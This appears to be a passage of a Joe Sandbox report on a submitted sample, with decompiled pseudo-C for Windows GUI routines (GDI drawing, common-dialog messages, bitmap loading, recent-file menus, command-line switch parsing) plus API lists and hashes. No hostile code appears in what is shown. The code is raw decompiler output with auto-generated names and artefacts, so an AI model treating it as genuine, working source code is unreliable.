                  • GetClientRect.USER32 ref: 0041CACB
                    • Part of subcall function 00422AAE: SetWindowOrgEx.GDI32(?,?,?,?), ref: 00422ACF
                    • Part of subcall function 00422AAE: SetWindowOrgEx.GDI32(?,?,?,?), ref: 00422AE2
                    • Part of subcall function 00423194: SelectObject.GDI32(?,00000000), ref: 004231BA
                    • Part of subcall function 00423194: SelectObject.GDI32(?,?), ref: 004231D0
                    • Part of subcall function 0041B443: Rectangle.GDI32(?,?,?,?,?), ref: 0041B459
                    • Part of subcall function 00422BBC: MoveToEx.GDI32(?,?,?,?), ref: 00422BDD
                    • Part of subcall function 00422BBC: MoveToEx.GDI32(?,?,?,?), ref: 00422BF0
                    • Part of subcall function 004226D4: MoveToEx.GDI32(?,?,?,00000000), ref: 004226F1
                    • Part of subcall function 004226D4: LineTo.GDI32(?,?,?), ref: 00422700
                  • GetStockObject.GDI32(00000000), ref: 0041CBC7
                  • FillRect.USER32 ref: 0041CBD8
                    • Part of subcall function 0042D602: GetViewportExtEx.GDI32(?,?), ref: 0042D615
                    • Part of subcall function 0042D602: GetWindowExtEx.GDI32(?,?), ref: 0042D622
                    • Part of subcall function 0042DB24: GetDeviceCaps.GDI32(?,0000000A), ref: 0042DB3B
                    • Part of subcall function 0042DB24: GetDeviceCaps.GDI32(?,00000008), ref: 0042DB44
                    • Part of subcall function 0042DB24: SetMapMode.GDI32(?,00000001), ref: 0042DB5C
                    • Part of subcall function 0042DB24: SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 0042DB6A
                    • Part of subcall function 0042DB24: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 0042DB7A
                    • Part of subcall function 0042DB24: IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 0042DB95
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CapsDeviceRectWindow$MoveObjectViewport$ColorSelect$ClientClipCreateFillH_prolog3IntersectLineModeRectangleStock
                  • String ID: ($</E$</E$</E
                  • API String ID: 4163831729-2541786092
                  • Opcode ID: f0e1fe2535ffc2d713cc78e5f4c5b5910e9f6dc1d354313586de08d357af2196
                  • Instruction ID: 4748042c30c6ea2c037a8edb363e0c25ba98aba555b109a0587ae0009503a143
                  • Opcode Fuzzy Hash: f0e1fe2535ffc2d713cc78e5f4c5b5910e9f6dc1d354313586de08d357af2196
                  • Instruction Fuzzy Hash: 99E13A71A002199FCB05DFA8D985FEDB7B6FF48304F1440AAE919AB256CB34A941CF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E0042A570(void* __ebx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t31;
                  				signed int _t33;
                  				void* _t40;
                  				int _t46;
                  				void* _t51;
                  				intOrPtr _t52;
                  				signed int _t58;
                  				signed int* _t66;
                  				void* _t67;
                  				signed int _t68;
                  				signed int _t70;
                  
                  				_t51 = __ebx;
                  				if(_a4 != 0) {
                  					_push(_t67);
                  					_push(0x406452);
                  					_t54 = 0x466508;
                  					_t68 = E00420AEC(__ebx, 0x466508, 0, _t67, __eflags);
                  					__eflags = _t68;
                  					if(__eflags == 0) {
                  						E00406436(__ebx, 0x466508, 0, _t68, __eflags);
                  					}
                  					__eflags =  *(_t68 + 0x18);
                  					if(__eflags != 0) {
                  						__eflags = E0040EE68(_t54, 0, _t68, __eflags, _a4);
                  						if(__eflags == 0) {
                  							_t54 =  *(_t68 + 0x18);
                  							E0040FCD3( *(_t68 + 0x18), __eflags, _a4);
                  							 *(_t68 + 0x18) = 0;
                  						}
                  					}
                  					_push(_t51);
                  					_t52 = _a8;
                  					__eflags = _t52 - 0x110;
                  					if(_t52 != 0x110) {
                  						__eflags = _t52 -  *0x466928; // 0x0
                  						if(__eflags == 0) {
                  							L25:
                  							SendMessageA(_a4, 0x111, 0xe146, 0);
                  							_t31 = 1;
                  							__eflags = 1;
                  							goto L26;
                  						}
                  						__eflags = _t52 - 0x111;
                  						if(_t52 != 0x111) {
                  							L12:
                  							__eflags = _t52 - 0xc000;
                  							if(__eflags < 0) {
                  								L22:
                  								_t31 = 0;
                  								goto L26;
                  							}
                  							_t70 = E0040EE68(_t54, 0x110, _t68, __eflags, _a4);
                  							__eflags = _t70;
                  							if(_t70 == 0) {
                  								goto L22;
                  							}
                  							_t33 = E0041E99D(_t70, 0x454738);
                  							__eflags = _t33;
                  							if(_t33 == 0) {
                  								L16:
                  								__eflags = _t52 -  *0x46691c; // 0x0
                  								if(__eflags != 0) {
                  									__eflags = _t52 -  *0x466920; // 0x0
                  									if(__eflags != 0) {
                  										__eflags = _t52 -  *0x466918; // 0x0
                  										if(__eflags != 0) {
                  											__eflags = _t52 -  *0x466924; // 0x0
                  											if(__eflags != 0) {
                  												goto L22;
                  											}
                  											_t31 =  *((intOrPtr*)( *_t70 + 0x164))();
                  											goto L26;
                  										}
                  										_t58 = _a16 >> 0x10;
                  										__eflags = _t58;
                  										 *((intOrPtr*)( *_t70 + 0x16c))(_a12, _a16 & 0x0000ffff, _t58);
                  										goto L22;
                  									}
                  									_t19 = _t70 + 0x1d4; // 0x1d4
                  									_t66 = _t19;
                  									 *_t66 = _a16;
                  									_t31 =  *((intOrPtr*)( *_t70 + 0x168))();
                  									 *_t66 =  *_t66 & 0x00000000;
                  									goto L26;
                  								}
                  								_t31 =  *((intOrPtr*)( *_t70 + 0x164))(_a16);
                  								goto L26;
                  							}
                  							_t40 = E00417298(_t70);
                  							__eflags =  *(_t40 + 0x34) & 0x00080000;
                  							if(( *(_t40 + 0x34) & 0x00080000) != 0) {
                  								goto L22;
                  							}
                  							goto L16;
                  						}
                  						_t54 = 0x40e;
                  						__eflags = _a12 - 0x40e;
                  						if(_a12 == 0x40e) {
                  							goto L25;
                  						}
                  						goto L12;
                  					} else {
                  						 *0x466918 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
                  						 *0x46691c = RegisterClipboardFormatA("commdlg_ShareViolation");
                  						 *0x466920 = RegisterClipboardFormatA("commdlg_FileNameOK");
                  						 *0x466924 = RegisterClipboardFormatA("commdlg_ColorOK");
                  						 *0x466928 = RegisterClipboardFormatA("commdlg_help");
                  						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
                  						_push(_a16);
                  						 *0x46692c = _t46;
                  						_push(_a12);
                  						_t31 = E00417499(_t52, _t54, 0x110, RegisterWindowMessageA, _a4, 0x110);
                  						L26:
                  						return _t31;
                  					}
                  				}
                  				return 0;
                  			}


















                  APIs
                  • RegisterClipboardFormatA.USER32 ref: 0042A5D6
                  • RegisterClipboardFormatA.USER32 ref: 0042A5E2
                  • RegisterClipboardFormatA.USER32 ref: 0042A5EE
                  • RegisterClipboardFormatA.USER32 ref: 0042A5FA
                  • RegisterClipboardFormatA.USER32 ref: 0042A606
                  • RegisterClipboardFormatA.USER32 ref: 0042A612
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClipboardFormatRegister
                  • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                  • API String ID: 1228543026-3888057576
                  • Opcode ID: a71ff197eab65d9337ce50063d1dea6a73ac7128dca34fbf681d27b19aded0f9
                  • Instruction ID: b1fb21f4436616dfddf3654ade33f9c9fefc51839f7fc6c1fd550e6eedef1f38
                  • Opcode Fuzzy Hash: a71ff197eab65d9337ce50063d1dea6a73ac7128dca34fbf681d27b19aded0f9
                  • Instruction Fuzzy Hash: A841D270700225EBCF219F21ED88A6E3BA1EB84314B65043BFC415B251D77D88A5CBAF
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E00406B0C(signed int _a4, signed int _a8, int _a12) {
                  				BITMAPINFO* _v8;
                  				struct HDC__* _v12;
                  				void* _v16;
                  				void* _v20;
                  				void* _v24;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t53;
                  				BITMAPINFO* _t54;
                  				BITMAPINFO* _t59;
                  				signed char _t63;
                  				struct HDC__* _t69;
                  				struct HBITMAP__* _t70;
                  				void* _t74;
                  				struct HDC__* _t75;
                  				struct HWND__* _t84;
                  				intOrPtr* _t92;
                  				void* _t97;
                  				signed int _t98;
                  				intOrPtr _t102;
                  				int* _t103;
                  				int _t104;
                  				BITMAPINFO* _t107;
                  
                  				_t53 = LoadResource(_a4, _a8);
                  				_t84 = 0;
                  				_v24 = _t53;
                  				if(_t53 != 0) {
                  					_t54 = LockResource(_t53);
                  					_v8 = _t54;
                  					__eflags = _t54;
                  					if(_t54 == 0) {
                  						goto L1;
                  					}
                  					_t101 = _t54->bmiHeader + 0x40;
                  					_t107 = E0043108C(0, _t97, _t54->bmiHeader + 0x40, _t54->bmiHeader + 0x40);
                  					__eflags = _t107;
                  					if(_t107 != 0) {
                  						E004059F9(_t101, _t107, _t107, _t101, _v8, _t101);
                  						_t59 = _t107 + _t107->bmiHeader;
                  						__eflags = _t59;
                  						_v12 = _t59;
                  						_a8 = 0;
                  						do {
                  							_t92 = _t59 + _a8 * 4;
                  							_t102 =  *_t92;
                  							_t98 = 0;
                  							__eflags = 0;
                  							_v16 = _t92;
                  							while(1) {
                  								__eflags = _t102 -  *((intOrPtr*)(0x44fbec + _t98 * 8));
                  								if(_t102 ==  *((intOrPtr*)(0x44fbec + _t98 * 8))) {
                  									break;
                  								}
                  								_t98 = _t98 + 1;
                  								__eflags = _t98 - 4;
                  								if(_t98 < 4) {
                  									continue;
                  								}
                  								goto L14;
                  							}
                  							__eflags = _a12 - _t84;
                  							if(_a12 == _t84) {
                  								_t103 = 0x44fbf0 + _t98 * 8;
                  								_a4 = GetSysColor( *_t103) >> 0x00000008 & 0x000000ff;
                  								_t63 = GetSysColor( *_t103);
                  								 *_v16 = GetSysColor( *_t103) >> 0x00000010 & 0x000000ff | ((_t63 & 0x000000ff) << 0x00000008 | _a4) << 0x00000008;
                  								_t59 = _v12;
                  								_t84 = 0;
                  								__eflags = 0;
                  							} else {
                  								__eflags =  *(0x44fbf0 + _t98 * 8) - 0x12;
                  								if( *(0x44fbf0 + _t98 * 8) != 0x12) {
                  									 *_t92 = 0xffffff;
                  								}
                  							}
                  							L14:
                  							_a8 = _a8 + 1;
                  							__eflags = _a8 - 0x10;
                  						} while (_a8 < 0x10);
                  						_t104 = _t107->bmiHeader.biWidth;
                  						_a12 = _t104;
                  						_a8 = _t107->bmiHeader.biHeight;
                  						_t69 = GetDC(_t84);
                  						_v12 = _t69;
                  						_t70 = CreateCompatibleBitmap(_t69, _t104, _a8);
                  						_v16 = _t70;
                  						__eflags = _t70 - _t84;
                  						if(__eflags != 0) {
                  							_t75 = CreateCompatibleDC(_v12);
                  							_t104 = SelectObject;
                  							_a4 = _t75;
                  							_v20 = SelectObject(_t75, _v16);
                  							__eflags = 1;
                  							StretchDIBits(_a4, _t84, _t84, _a12, _a8, _t84, _t84, _a12, _a8, _v8 + 0x28 + (1 << _t107->bmiHeader.biBitCount) * 4, _t107, _t84, 0xcc0020);
                  							SelectObject(_a4, _v20);
                  							DeleteDC(_a4);
                  						}
                  						ReleaseDC(_t84, _v12);
                  						_push(_t107);
                  						E004316F6(_t84, _t104, _t107, __eflags);
                  						FreeResource(_v24);
                  						_t74 = _v16;
                  						goto L18;
                  					} else {
                  						_t74 = 0;
                  						L18:
                  						return _t74;
                  					}
                  				}
                  				L1:
                  				return 0;
                  			}





























                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$LoadLock_malloc
                  • String ID:
                  • API String ID: 2582927105-0
                  • Opcode ID: 8cdaa2f3bf9c54f2ba2fe1be78cdd77049d2bf2b09ec426ef17af4b37fb9623c
                  • Instruction ID: ff51ff42c0de1c3a1b4d8765aabfec9eb562106eb3c68f9e24e3f7d0f5cce2f8
                  • Opcode Fuzzy Hash: 8cdaa2f3bf9c54f2ba2fe1be78cdd77049d2bf2b09ec426ef17af4b37fb9623c
                  • Instruction Fuzzy Hash: D9519FB5800218FFDB019FA5CC888AE7BB5FF49314B11843AF916E7260C735AA61DF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E0042CFF6(intOrPtr* __ecx) {
                  				void* _v8;
                  				void* _t19;
                  				void* _t21;
                  				void* _t45;
                  
                  				_push(__ecx);
                  				if( *(__ecx + 4) != 0) {
                  					_t21 = SelectObject( *(__ecx + 8), GetStockObject(7));
                  					_v8 = _t21;
                  					SelectObject( *(__ecx + 8), _t21);
                  					SelectObject( *(__ecx + 4), _v8);
                  					_t45 = SelectObject( *(__ecx + 8), GetStockObject(4));
                  					SelectObject( *(__ecx + 8), _t45);
                  					SelectObject( *(__ecx + 4), _t45);
                  					E00422568(__ecx, GetROP2( *(__ecx + 8)));
                  					E00422504(__ecx, GetBkMode( *(__ecx + 8)));
                  					E0042270B(__ecx, GetTextAlign( *(__ecx + 8)));
                  					E00422536(__ecx, GetPolyFillMode( *(__ecx + 8)));
                  					E0042259A(__ecx, GetStretchBltMode( *(__ecx + 8)));
                  					_push(E0042CF92(__ecx, GetTextColor( *(__ecx + 8))));
                  					 *((intOrPtr*)( *__ecx + 0x30))();
                  					_push(E0042CF92(__ecx, GetBkColor( *(__ecx + 8))));
                  					_t19 =  *((intOrPtr*)( *__ecx + 0x2c))();
                  				}
                  				return _t19;
                  			}

                  APIs
                  • GetStockObject.GDI32(00000007), ref: 0042D013
                  • SelectObject.GDI32(?,00000000), ref: 0042D01F
                  • SelectObject.GDI32(?,00000000), ref: 0042D028
                  • SelectObject.GDI32(00000000,00000000), ref: 0042D030
                  • GetStockObject.GDI32(00000004), ref: 0042D034
                  • SelectObject.GDI32(?,00000000), ref: 0042D03A
                  • SelectObject.GDI32(?,00000000), ref: 0042D042
                  • SelectObject.GDI32(00000000,00000000), ref: 0042D048
                  • GetROP2.GDI32(?), ref: 0042D04D
                    • Part of subcall function 00422568: SetROP2.GDI32(?,?), ref: 00422585
                    • Part of subcall function 00422568: SetROP2.GDI32(?,?), ref: 00422592
                  • GetBkMode.GDI32(?), ref: 0042D05E
                    • Part of subcall function 00422504: SetBkMode.GDI32(?,?), ref: 00422521
                    • Part of subcall function 00422504: SetBkMode.GDI32(?,?), ref: 0042252E
                  • GetTextAlign.GDI32(?), ref: 0042D06F
                    • Part of subcall function 0042270B: SetTextAlign.GDI32(?,?), ref: 0042272A
                    • Part of subcall function 0042270B: SetTextAlign.GDI32(?,?), ref: 00422737
                  • GetPolyFillMode.GDI32(?), ref: 0042D080
                    • Part of subcall function 00422536: SetPolyFillMode.GDI32(?,?), ref: 00422553
                    • Part of subcall function 00422536: SetPolyFillMode.GDI32(?,?), ref: 00422560
                  • GetStretchBltMode.GDI32(?), ref: 0042D091
                    • Part of subcall function 0042259A: SetStretchBltMode.GDI32(?,?), ref: 004225B7
                    • Part of subcall function 0042259A: SetStretchBltMode.GDI32(?,?), ref: 004225C4
                  • GetTextColor.GDI32(?), ref: 0042D0A2
                    • Part of subcall function 0042CF92: GetNearestColor.GDI32(?,?), ref: 0042CF9D
                  • GetBkColor.GDI32(?), ref: 0042D0BB
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Mode$Object$Select$Text$AlignColorFillPolyStretch$Stock$Nearest
                  • String ID:
                  • API String ID: 1146216143-0
                  • Opcode ID: b5fa28f46895a85eae3298702a4519f40f3671a29730695325d86269032407d6
                  • Instruction ID: 2f3b6f2030e1e86d12445eb7730afd10813b0898199679e719625b019b3605a4
                  • Opcode Fuzzy Hash: b5fa28f46895a85eae3298702a4519f40f3671a29730695325d86269032407d6
                  • Instruction Fuzzy Hash: C2216075200A24BFCB217B67DD08D2FBAEAFF88704740842DF15A82570CB75AD52DB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E00426E96(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4) {
                  				signed int _v8;
                  				long _v32;
                  				char _v268;
                  				char _v292;
                  				void* _v296;
                  				signed int _v300;
                  				char _v304;
                  				signed int _v308;
                  				long _v312;
                  				char _v316;
                  				char _v320;
                  				signed int _t103;
                  				void* _t110;
                  				long _t115;
                  				signed int _t125;
                  				signed int _t129;
                  				signed int _t131;
                  				signed int _t139;
                  				intOrPtr _t142;
                  				void* _t146;
                  				intOrPtr* _t148;
                  				void* _t171;
                  				void* _t181;
                  				void* _t183;
                  				int _t184;
                  				signed int _t185;
                  				intOrPtr* _t186;
                  				signed int _t187;
                  				intOrPtr _t188;
                  				int _t203;
                  				void* _t220;
                  				CHAR* _t222;
                  				intOrPtr* _t223;
                  				signed int _t224;
                  				void* _t225;
                  				intOrPtr* _t227;
                  				signed int _t228;
                  				void* _t229;
                  				signed int _t231;
                  				signed int _t233;
                  				void* _t234;
                  
                  				_t220 = __edx;
                  				_t186 = __ecx;
                  				_t181 = __ebx;
                  				_t231 = _t233;
                  				_t234 = _t233 - 0x108;
                  				_t103 =  *0x463404; // 0x18eab29f
                  				_v8 = _t103 ^ _t231;
                  				_push(__esi);
                  				_push(__edi);
                  				_t222 = _a4;
                  				_t227 = __ecx;
                  				if(_t222 == 0 || lstrlenA(_t222) >= 0x104) {
                  					_push(0);
                  					_push(0xffffffff);
                  					_push(3);
                  					E0042EA62(_t181, _t220, _t222, _t227, __eflags);
                  					asm("int3");
                  					_push(0x130);
                  					E00431B04(E0044C36D, _t181, _t222, _t227);
                  					_t228 = _a4;
                  					__eflags = _t228;
                  					_t223 = _t186;
                  					__eflags = 0 | _t228 != 0x00000000;
                  					if(__eflags == 0) {
                  						E00406436(_t181, _t186, _t223, _t228, __eflags);
                  					}
                  					_t187 =  *(_t228 + 0xc);
                  					_t182 = _t223 + 0x1c;
                  					_t110 =  *_t182;
                  					__eflags =  *(_t110 - 0xc);
                  					if( *(_t110 - 0xc) == 0) {
                  						__eflags = _t187;
                  						if(_t187 != 0) {
                  							E0041F5B6(_t182, _t187,  *(_t228 + 4), _t182, 0);
                  						}
                  					}
                  					_t188 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 8))));
                  					__eflags =  *(_t188 - 0xc);
                  					if( *(_t188 - 0xc) != 0) {
                  						__eflags =  *(_t228 + 0xc);
                  						if( *(_t228 + 0xc) != 0) {
                  							_t183 = 0;
                  							__eflags =  *(_t223 + 4);
                  							if( *(_t223 + 4) > 0) {
                  								do {
                  									DeleteMenu( *( *(_t228 + 0xc) + 4),  *(_t228 + 4) + _t183, 0);
                  									_t183 = _t183 + 1;
                  									__eflags = _t183 -  *(_t223 + 4);
                  								} while (_t183 <  *(_t223 + 4));
                  							}
                  							_t182 = 0x104;
                  							_t115 = GetCurrentDirectoryA(0x104,  &_v292);
                  							__eflags = _t115;
                  							if(_t115 != 0) {
                  								__eflags = _t115 - 0x104;
                  								if(_t115 < 0x104) {
                  									_t184 = lstrlenA( &_v292);
                  									 *((char*)(_t231 + _t184 - 0x120)) = 0x5c;
                  									_t182 = _t184 + 1;
                  									_v312 = _t182;
                  									 *((char*)(_t231 + _t182 - 0x120)) = 0;
                  									E004014C0( &_v308, _t220);
                  									_v8 = _v8 & 0x00000000;
                  									E004014C0( &_v304, _t220);
                  									_v300 = _v300 & 0x00000000;
                  									__eflags =  *(_t223 + 4);
                  									_v8 = 1;
                  									if( *(_t223 + 4) > 0) {
                  										while(1) {
                  											_t125 =  *((intOrPtr*)( *_t223 + 8))( &_v308, _v300,  &_v292, _t182, 1);
                  											__eflags = _t125;
                  											if(_t125 == 0) {
                  												goto L42;
                  											}
                  											_t185 = _v308;
                  											_v296 = E004014F0( &_v304,  *((intOrPtr*)(_t185 - 0xc)) +  *((intOrPtr*)(_t185 - 0xc)));
                  											while(1) {
                  												_t129 =  *_t185;
                  												__eflags = _t129;
                  												if(_t129 == 0) {
                  													break;
                  												}
                  												__eflags = _t129 - 0x26;
                  												if(_t129 == 0x26) {
                  													_t59 =  &_v296;
                  													 *_t59 = _v296 + 1;
                  													__eflags =  *_t59;
                  													 *_v296 = 0x26;
                  												}
                  												_t131 = E00434A02( *_t185);
                  												__eflags = _t131;
                  												if(_t131 != 0) {
                  													_v296 = _v296 + 1;
                  													 *_v296 =  *_t185;
                  													_t185 = _t185 + 1;
                  													__eflags = _t185;
                  												}
                  												_v296 = _v296 + 1;
                  												 *_v296 =  *_t185;
                  												_t185 = _t185 + 1;
                  												__eflags = _t185;
                  											}
                  											 *_v296 = 0;
                  											E0040A356( &_v304, 0xffffffff);
                  											_t139 =  *((intOrPtr*)(_t223 + 0x14)) + _v300 + 0x00000001 & 0x0000000f;
                  											_t203 = 0xa;
                  											__eflags = _t139 - _t203;
                  											if(__eflags <= 0) {
                  												if(__eflags != 0) {
                  													_push(_t139);
                  													_push("&%d ");
                  													goto L40;
                  												} else {
                  													E004048C1(_t185, _t203, _t223, _t228, E00433C67(_t220,  &_v32, _t203, "1&0 "));
                  												}
                  											} else {
                  												_push(_t139);
                  												_push("%d ");
                  												L40:
                  												swprintf( &_v32, _t203);
                  											}
                  											_t142 =  *((intOrPtr*)(_t228 + 8));
                  											_t182 =  *(_t228 + 4);
                  											_v296 = _t142;
                  											 *((intOrPtr*)(_t228 + 8)) = _t142 + 1;
                  											_t79 = _t182 + 1; // 0x2
                  											 *(_t228 + 4) = _t79;
                  											_push( &_v32);
                  											_t146 = E00406039( *(_t228 + 4),  &_v320, _t220, _t223, _t228, __eflags);
                  											_push( &_v304);
                  											_push(_t146);
                  											_push( &_v316);
                  											_v8 = 2;
                  											_t148 = E00426CA7( *(_t228 + 4), _t223, _t228, __eflags);
                  											_t234 = _t234 + 0x1c;
                  											E00426898( *(_t228 + 0xc), _v296, 0x400,  *(_t228 + 4),  *_t148);
                  											E004010B0(_v316 + 0xfffffff0, _t220);
                  											_v8 = 1;
                  											E004010B0(_v320 + 0xfffffff0, _t220);
                  											_v300 = _v300 + 1;
                  											__eflags = _v300 -  *(_t223 + 4);
                  											if(_v300 <  *(_t223 + 4)) {
                  												_t182 = _v312;
                  												continue;
                  											}
                  											goto L42;
                  										}
                  									}
                  									L42:
                  									 *((intOrPtr*)(_t228 + 8)) =  *((intOrPtr*)(_t228 + 8)) - 1;
                  									 *((intOrPtr*)(_t228 + 0x20)) = GetMenuItemCount( *( *(_t228 + 0xc) + 4));
                  									 *((intOrPtr*)(_t228 + 0x18)) = 1;
                  									E004010B0(_v304 + 0xfffffff0, _t220);
                  									__eflags = _v308 + 0xfffffff0;
                  									E004010B0(_v308 + 0xfffffff0, _t220);
                  								}
                  							}
                  						}
                  					} else {
                  						_t182 =  *_t182;
                  						__eflags =  *(_t182 - 0xc);
                  						if( *(_t182 - 0xc) != 0) {
                  							 *((intOrPtr*)( *_t228 + 0xc))(_t182);
                  						}
                  						 *((intOrPtr*)( *_t228))(0);
                  					}
                  					return E00431B87(_t182, _t223, _t228);
                  				} else {
                  					E004292D1( &_v268, _t222);
                  					_t224 = 0;
                  					if( *((intOrPtr*)(_t227 + 4)) - 1 > 0) {
                  						while(E004289FF(_t227,  *((intOrPtr*)( *((intOrPtr*)(_t227 + 8)) + _t224 * 4)),  &_v268) == 0) {
                  							_t224 = _t224 + 1;
                  							if(_t224 <  *((intOrPtr*)(_t227 + 4)) - 1) {
                  								continue;
                  							} else {
                  								L8:
                  								while(_t224 > 0) {
                  									E004057D4( *((intOrPtr*)(_t227 + 8)) + _t224 * 4,  *((intOrPtr*)(_t227 + 8)) + _t224 * 4 - 4);
                  									_t224 = _t224 - 1;
                  									__eflags = _t224;
                  								}
                  								goto L9;
                  							}
                  							goto L8;
                  						}
                  						goto L8;
                  					}
                  					L9:
                  					_t171 = E00402830(_t220, _t224,  &_v268);
                  					_pop(_t225);
                  					_pop(_t229);
                  					return E00430650(_t171, _t181, _v8 ^ _t231, _t220, _t225, _t229);
                  				}
                  			}

                  APIs
                  • lstrlenA.KERNEL32(?), ref: 00426EB7
                  • __EH_prolog3_GS.LIBCMT ref: 00426F46
                  • DeleteMenu.USER32(?,?,00000000,00000130,00000003,000000FF,00000000), ref: 00426FC3
                  • GetCurrentDirectoryA.KERNEL32(00000104,00000130,00000130,00000003,000000FF,00000000), ref: 00426FDC
                  • lstrlenA.KERNEL32(?), ref: 00426FF9
                  • swprintf.LIBCMT ref: 00427136
                    • Part of subcall function 004289FF: lstrcmpiA.KERNEL32(00000000,00000000,00000000,?), ref: 00428A24
                  • _strcpy_s.LIBCMT ref: 0042711E
                  • GetMenuItemCount.USER32 ref: 004271D2
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menulstrlen$CountCurrentDeleteDirectoryH_prolog3_Item_strcpy_slstrcmpiswprintf
                  • String ID: %d $&%d $1&0 $\
                  • API String ID: 2973701184-2399880791
                  • Opcode ID: 7d7898fec5ad83dd7a4620e5ab9e50ae39bfbcd1c461751bf6efaa05cfe8ec2d
                  • Instruction ID: b6265fcdd1575fe5806665c5d52ca27f8be5779e5917fe7b4e9aef7305b3ac5e
                  • Opcode Fuzzy Hash: 7d7898fec5ad83dd7a4620e5ab9e50ae39bfbcd1c461751bf6efaa05cfe8ec2d
                  • Instruction Fuzzy Hash: 16B1D371A002259FCB20DF65DD80FEAB7B4EF08314F5041AEE55997292DB38AE94CF19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E00415151(void* __ecx, CHAR* _a4) {
                  				int _t14;
                  				int _t15;
                  				void* _t16;
                  				void* _t17;
                  				void* _t18;
                  				void* _t20;
                  				void* _t21;
                  				void* _t22;
                  				void* _t23;
                  				CHAR* _t24;
                  				void* _t41;
                  				void* _t43;
                  				void* _t45;
                  				void* _t47;
                  
                  				_t24 = _a4;
                  				_t47 = __ecx;
                  				_t14 = lstrcmpA(_t24, "pt");
                  				if(_t14 == 0) {
                  					 *((intOrPtr*)(_t47 + 0x14)) = 3;
                  					return _t14;
                  				}
                  				_t15 = lstrcmpA(_t24, "p");
                  				if(_t15 == 0) {
                  					 *((intOrPtr*)(_t47 + 0x14)) = 2;
                  					return _t15;
                  				}
                  				_t16 = E0040D6F3(_t24, "Register");
                  				if(_t16 == 0) {
                  					L22:
                  					 *((intOrPtr*)(_t47 + 0x14)) = 5;
                  					return _t16;
                  				}
                  				_t16 = E0040D6F3(_t24, "Regserver");
                  				if(_t16 == 0) {
                  					goto L22;
                  				}
                  				_t16 = E0040D6F3(_t24, "RegisterPerUser");
                  				if(_t16 == 0) {
                  					L21:
                  					 *((intOrPtr*)(_t47 + 0x10)) = 1;
                  					goto L22;
                  				}
                  				_t16 = E0040D6F3(_t24, "RegserverPerUser");
                  				if(_t16 == 0) {
                  					goto L21;
                  				}
                  				_t17 = E0040D6F3(_t24, "Unregister");
                  				if(_t17 == 0) {
                  					L20:
                  					 *((intOrPtr*)(_t47 + 0x14)) = 6;
                  					return _t17;
                  				}
                  				_t17 = E0040D6F3(_t24, "Unregserver");
                  				if(_t17 == 0) {
                  					goto L20;
                  				}
